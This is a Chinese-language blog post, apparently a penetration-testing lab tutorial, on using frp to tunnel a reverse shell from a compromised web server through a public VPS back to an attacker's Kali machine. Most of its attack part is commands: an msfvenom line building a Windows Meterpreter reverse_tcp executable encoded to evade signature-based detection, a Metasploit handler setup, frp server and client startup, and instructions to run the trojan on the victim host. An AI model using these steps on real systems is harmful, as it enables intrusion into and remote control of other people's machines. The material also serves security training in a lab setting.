隧道代理-反向代理

已于 2023-10-18 10:50:57 修改
阅读量123 收藏
点赞数 3
文章标签: 网络 github 网络安全 安全
于 2023-10-14 17:13:35 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45953122/article/details/133827501
版权

文章目录

代理

实验环境:

  • 攻击机kali:192.168.160.32(NAT模式)
  • 模拟的公网服务器(本机):10.9.75.214
  • 失陷主机:10.9.75.127(桥接模式)

代理使用场景

1、拿下远程web服务器

2、webshell链接不稳定,需要使用稳定的木马程序

3、远程服务器无法直接链接攻击者电脑

4、需要借助公网vps转发来自失陷服务器的木马流量

5、借助frp服务端(vps)和客户端(内网攻击者)建立隧道

6、当vps某一个端口收到流量的时候,frps会根据提前和frpc约定好的规则,使用简历好的隧道转发流量

前提条件

拿下了公网上的一台主机(10.9.75.214)的webshell的权限,需要上传完整功能的木马文件。那么有一个问题,木马执行了后要找谁?此时的失陷主机是连接不到内网的攻击主机,这个时候就需要用到代理技术。

VPS

VPS是Virtual Private Serve的英文缩写,即虚拟专用服务器。VPS就是将一台物理服务器分割成多个独立的虚拟专项服务器,每一个VPS都可以分配独立的公网IP地址,独立的操作系统,能够实现不同VPS的磁盘空间、CPU资源、内存、系统等配置的隔离,通过虚拟技术让每一个用户使用VPS的时候都像是在使用一台独立服务器一样,自定义安装自己需要的东西。

公网VPS:

  • 可以理解为服务器上的虚拟机,攻击者可控。
  • 攻击者和受害者服务器都可以访问到。

建立隧道

image-20231013201014251

因为远程VPS不能访问攻击者的Kali主机。攻击者与远程VPS需要建立隧道,远程VPS使用7000端口建立一个监听(可以说隧道服务或者是代理服务),这样远程VPS就能够访问攻击者主机。还需要将远程VPS的4444端口的流量通过7000端口发送给攻击者的Kali。(代理的核心)

给失陷Web服务器的木马内容:

  • host:当木马执行的时候,去连接公网上的远程VPS。
  • post:连接远程VPS的4444端口。

frp

frp可以实现端口转发,端口监听,隧道功能。frp分为客户端和服务端。

Kali上启动的是客户端(frpc)

本机上启动的是服务端(frps)

frp运行起来的时候会自动的将7000端口开放,当然该端口可以在配置文件中进行修改。这样客户端和服务端就可以连接上了,他们之间就会有一个隧道。

远程VPS服务器的4444端口会主动转发数据流量给客户端的4444端口,不做任何操作,通过frp建立的隧道发送给远程连接的客户端的端口,至于转发给客户端的哪个端口,是由frpc的配置文件来决定的。

MSF木马生成

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.9.75.214 LPORT=4444 -e x86/shikata_ga_nai -f exe -o shell.exe -i 5

解释:

  • -p windows/meterpreter/reverse_tcp: 指定所使用的Payload(载荷)为Windows平台的Meterpreter反向TCP shell,这将在目标机器上与Metasploit框架监听器建立反向连接。
  • LHOST=10.9.75.214: 设置本地主机的IP地址,即Metasploit监听器所在的IP地址,用于接收反向连接。
  • LPORT=4444: 设置本地主机的端口号,即Metasploit监听器所监听的端口号。
  • -e X86/shikata_ga_nai: 使用shikata_ga_nai编码器对Payload进行混淆,以绕过一些基于签名和特征的安全防护机制。
  • -f exe: 指定生成的文件格式为可执行文件(exe)格式。
  • -o shell.exe: 指定生成的可执行文件的输出路径和文件名为shell.exe
  • -i 5: 设置迭代次数为5,表示对Payload进行重复编码5次以增加混淆程度。

image-20231014163933839

监听

使用msf进行监听

sudo msfconsole

载入监控模块

use exploit/multi/handler

加载payload

set payload windows/meterpreter/reverse_tcp
set lport 4444					# 监听本机的4444端口
set lhost 127.0.0.1				# 监听本机的IP地址也就是127.0.0.1
run

image-20231014164150171

此时本地已经启动了连接端口,查看Kali主机监听的端口号信息

ss -antpl #查看网络连接状态

解释:

ss -antpl 是一个用于显示当前系统网络连接状态的命令。下面对命令中的参数进行解释说明:

  • -a:显示所有的连接,包括监听和非监听状态的连接。
  • -n:不使用域名解析,以IP地址的形式显示连接信息。
  • -t:显示TCP协议的连接信息。
  • -p:显示与连接相关的进程信息。
  • -l:仅显示监听状态的连接。

image-20231014164528539

开启frp服务端和客户端

注意:先开启frp服务端再开启frp的客户端

开启frp服务端

.\frps.exe -c frps.ini

说明:-c表示指定服务端的配置文件。

image-20231014164437512

开启frp客户端

将frp压缩包先进行一个解压操作。

tar xf frp_0.33.0_linux_amd64.tar.gz  # 解压缩包
 sudo ./frpc -c frpc.ini # 启动frpc

配置文件解释:

image-20231014153353422

image-20231014153057596

image-20231014154031464

启动成功。

frp服务端情况:

image-20231014165331959

执行exe木马文件

将木马文件上传到失陷主机上,双击执行即可。

kali攻击机成功监听。

image-20231014165501641

g_h_i
关注
  • 3
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
隧道技术之不出网-反向代理
G3et的博客
05-20 251
代理服务器来接受internet上的连接请求,然后将请求转发给内部网络上的服务器,并将从服务器上得到的结果返回给internet上请求连接的客户端,此时代理服务器对外就表现为一个服务器。然后点击Add --> Target hosts选择内网段IP --> Action选择你的那台vps 再点击ok就行。反向代理指的是服务器端代理代理服务器,客户端不知道实际提供服务的服务器。随后浏览器尝试访问内网IP,可以看见已经成功访问。点击Add然后输入你vps ip和你设置的端口。建立socks5代理
内网渗透工具-反向代理nps使用分析
m0_72121223的博客
07-11 7440
内网渗透 反向代理 NPS 流量分析
Nginx-反向代理-WebSocket代理
weixin_43404791的博客
05-16 334
WebSocket代理 要将客户端和服务器之间的连接从HTTP / 1.1转换为WebSocket,将使用HTTP / 1.1中可用的协议切换机制。 但是,有一个微妙之处:由于“Upgrade”是 逐跳的 标头,因此它不会从客户端传递到代理服务器。使用正向代理,客户端可以使用该CONNECT 方法来规避此问题。但是,这不适用于反向代理,因为客户端不知道任何代理服务器,并且需要对代理服务器进行特殊处理。 从1.3.13版开始,nginx实施了特殊的操作模式,如果代理服务器返回了代码为101(交换协议)的响应,
反向代理搭建隧道
njmanong的博客
02-18 624
首先以服务器系统为Ubuntu18.04为例 由于SSH在一段时间没有数据包之后会断开,所以最好直接使用autossh来配置反向代理。 (以下操作均在内网进行,而且我采用的是在root账户进行操作) 首先是安装autossh:我在服务器上重装的是Ubuntu18.04,可用以下命令进行安装 apt-get install autossh 然后添加我们的内网机器的ssh-key到公网以实现自动登陆:ssh-copy-id <公网机器A的登陆用户名>@<公网机器的ip地址>。
反向代理
hyz792901324的博客
01-07 356
1.为什么需要代理 A-->B 无法访问 C-->B 可以访问 A-->C 可以访问C A如果想访问B就可以通过C来访问 A-->C-->B C就是代理 2.代理类型 服务器/程序---->C----->其他服务器 这是正向代理,也就是通常用的翻墙 客户端--->C--->服务器 这...
内网穿透 - SSH反向代理
u011865919的博客
11-25 2863
SSH反向代理有着很广泛的实际应用, 实例描述: 在家庭局域网放置有一个树莓派主机,正常情况下只能在家庭局域网内 ssh连接这台树莓派主机,但如果本人想在其他地方对它进行远程登陆,则需要进行SSH反向代理。 如下图示例,我的树莓派主机A可以ping通我的公网主机B(有公网IP),远程操控的主机C也可以ping通我的公网主机B,主机A和C之间是无法直接连通,它们分属两个局域网。 SSH有个强大的功...
反向代理支持WebSocket
SonOfWind0311的博客
07-12 1658
本来利用jetty的ProxyServlet实现了一个反向代理,最近发现无法支持WebSocket,利用jetty的WebSocket特性实现了反向代理支持WebSocket。
# SSH端口转发之上网代理、正向代理反向代理用法
超级无敌棒棒糖
05-20 623
上网代理(动态端口转发)可用于代理上网(socks)正向代理(本地端口转发)与反向代理(远程端口转发)都是端口到端口的转发,一般用于解决网络安全网络防火墙限制、NAT等问题。
图解正向代理反向代理、透明代理
weixin_39713838的博客
02-15 226
一、正向代理(Forward Proxy) 一般情况下,如果没有特别说明,代理技术默认说的是正向代理技术。关于正向代理的概念如下: 正向代理(forward)是一个位于客户端【用户A】和原始服务器(origin server)【服务器B】之间的服务器【代理服务器Z】,为了从原始服务器取得内容,用户A向代理服务器Z发送一个请求并指定目标(服务器B),然后代理服务器Z向服务器B转交请求并将获得的内容返...
使用autossh+阿里云做反向代理笔记,无需任何第三方软件
08-05
在IT行业中,内网穿透和反向代理是两个重要的网络技术概念,特别是在远程访问和分布式系统中。本文将深入探讨如何使用autossh和阿里云服务实现这一目标,无需额外的第三方软件。 首先,让我们理解一下核心组件:...
Invoke-SocksProxy:使用Powershell的袜子代理和反向袜子服务器
05-04
反向代理通过启动可以通过系统代理的出站SSL连接来创建tcp隧道。 然后,该隧道可用作远程主机上的袜子代理,以转入本地主机的网络。例子当地的在端口1080上创建Socks 4/5代理: Import-Module .\Invoke-SocksProxy....
C#2.0中的简单反向代理(描述和部署)
04-11
在C#2.0中创建一个简单的反向代理是一个实用的技术,它允许通过服务器转发请求到其他服务器,以便隐藏原始源或平衡负载。这个过程在Web开发中特别有用,因为它可以提供灵活性,安全性和性能优化。本文将深入探讨...
PortFusion:TCP 的分布式反向/正向代理隧道解决方案。-开源
07-01
PortFusion 是一个简约的、跨平台的、传输层分布式反向/转发 TCP 代理,用 Haskell + LLVM 编写并在 GPLv3 下发布。 一个单一的包,通过利用每个平台的独特功能来充分利用每个平台,将这种功能与直观的界面、漂亮的...
tcp-tunnel-reverse-proxy:通过隧道注册服务的TCP反向代理
04-01
TCP隧道反向代理 通过隧道注册服务的TCP反向代理
【Socket 编程】基于UDP协议建立多人聊天室
稻草人敲代码的博客
07-19 359
对于服务端来说,除了要接收消息之外,还要实现一个路由转发模块,该路由转发模块可以将相应发送给所有连接的客户端。而对于客户端来说,除了要发送消息给聊天室,还要能实时看到其它所有客户端的消息。下面来看看具体实现的代码,代码只给出核心模块,其余代码模块代码可以借鉴我之前的博客。具体来说,服务器类实现的功能只有收消息。
网络协议-SOTP 协议格式
ziyunLLL的博客
07-19 377
SOTP(Secure Overlay Transport Protocol)是一种安全的覆盖层传输协议,旨在提供增强的安全性和功能。2.密钥管理:密钥的管理和交换是协议安全的重要部分,通常使用公钥基础设施(PKI)或密钥交换协议(如 Diffie-Hellman)。1.安全性:确保加密算法和认证算法的安全性。常用的加密算法包括 AES,常用的认证算法包括 HMAC-SHA256。3.性能:加密和认证会增加计算开销,需要在安全性和性能之间找到平衡。SOTP 协议格式的一般结构。
SpringBoot整合SSE,实现后端主动推送DEMO
zjy660358的专栏
07-17 376
说起服务端主动推送,大家第一个想到的一定是WEBSOCKET。作为软件工程师,不能无脑使用一种技术,要结合实际情况,择优选取。SSE(Server-Sent Events)相比于WEBSOCKET1、轻量化、兼容性 基于传统的HTTP协议,所以浏览器兼容性比较好2、 只支持单向通讯。(服务器->客户端)
docker build时的网络问题
最新发布
flynetcn的专栏
07-19 276
docker build网络问题
你这种方式,只是做了反向代理,我要做mysql的所有请求的stream代理
06-14
对不起,我理解错了你的需求。如果你要使用 Nginx 进行 MySQL 的 stream 代理,你可以使用 Nginx 的 Stream Core Module。下面是一个简单的配置示例: ``` stream { server { listen 80; proxy_pass mysql_server:3306; } } ``` 这将会将所有的 MySQL 流量通过 Nginx 转发到 mysql_server:3306 上。你可以将 mysql_server 替换为你的 MySQL 服务器的 IP 或域名。 请注意,使用这种方式代理 MySQL 可能会带来一些风险,因为 MySQL 流量是明文传输的。为了保证安全,建议使用 SSL 或 SSH 隧道来加密 MySQL 流量。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值